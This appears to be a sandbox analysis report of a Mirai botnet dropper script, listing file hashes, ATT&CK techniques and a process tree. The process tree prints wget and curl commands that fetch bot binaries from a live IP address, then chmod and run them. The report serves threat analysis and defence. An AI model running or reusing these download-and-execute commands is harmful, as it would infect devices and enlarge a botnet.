mirai | d888874124e3ec7f4dc0f980c78c89b4b9a1aac62309b3eb4aee15974fa29b47

Analysis

max time kernel
150s
max time network
146s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
16-02-2025 15:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Kraakper.sh
Size

2KB
MD5

217da6263dc653b10eb0c61fc6b668c1
SHA1

330c8839096b3d5d6f66f5731f66602d76c96d45
SHA256

d888874124e3ec7f4dc0f980c78c89b4b9a1aac62309b3eb4aee15974fa29b47
SHA512

e00cfeeccb54221eae3ab0ce5bccc461cbd89001771e127354f8aafedda5cac4a0856b1523a5a03b2b8790c1cbc64e04d5977e6da4c3220f58567cd4be4c628e

Score

10^/10

mirai kurc botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
739	chmod
802	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/Kraakper	740	Kraakper.sh
/tmp/Kraakper	804	Kraakper.sh

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
742	wget
791	curl
801	cat

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/kre4per.mips	curl
File opened for modification	/tmp/kre4per.mpsl	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/kre4per.x86	wget
File opened for modification	/tmp/kre4per.x86	curl
File opened for modification	/tmp/Kraakper	Kraakper.sh
File opened for modification	/tmp/kre4per.mips	wget

/tmp/Kraakper.sh
/tmp/Kraakper.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:707
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:713
- /usr/bin/wget
  wget http://144.172.73.45/bins/kre4per.x86
  2⤵
  - Writes file to tmp directory
  PID:719
- /usr/bin/curl
  curl -O http://144.172.73.45/bins/kre4per.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /bin/cat
  cat kre4per.x86
  2⤵
  PID:738
- /bin/chmod
  chmod +x busybox Kraakper Kraakper.sh kre4per.x86 systemd-private-97701d714b2b4aa2a3d1bae76dc08dc7-systemd-timedated.service-2h4YP6
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/Kraakper
  ./Kraakper
  2⤵
  PID:740
- /usr/bin/wget
  wget http://144.172.73.45/bins/kre4per.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:742
- /usr/bin/curl
  curl -O http://144.172.73.45/bins/kre4per.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:791
- /bin/cat
  cat kre4per.mips
  2⤵
  - System Network Configuration Discovery
  PID:801
- /bin/chmod
  chmod +x busybox Kraakper Kraakper.sh kre4per.mips kre4per.x86
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/Kraakper
  ./Kraakper
  2⤵
  PID:804
- /usr/bin/wget
  wget http://144.172.73.45/bins/kre4per.mpsl
  2⤵
  - Writes file to tmp directory
  PID:807

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Kraakper

Filesize
78KB

MD5
f42d3373e5fd409efd1d1ec30e1f14d2

SHA1
696f396f500bac9d6e8f37ae0c0012ebc41935ad

SHA256
98519df50f45e1740e083964afa2bdefe8847abe549a12cd3901d605679c0f24

SHA512
a19f201e97044749714e0e5b47b752a5d6eb30c5610a7016fe5bd861264a14793970cc23c0d6bd00ed043bd4d1663e27197ff47d214ee515e925cd56d081f2c6

Download Submit
/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit
/tmp/kre4per.x86

Filesize
53KB

MD5
f46d2aaea328699a338a9fa27054bb83

SHA1
24d7151b15c8bdbe838fc1824c5a7be42a764a13

SHA256
2bf70c104f6005f82de17b13efa905c445e9dd0de5b973726d4d76c707207a5b

SHA512
f7ad7da51775d8b8e9569304f2d079c48c053d5cf2625aa0ba9592f33616c379471ba3506fa43198106b0a817580b2b128a1389f52ccae1ce49de6e0844903c2

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads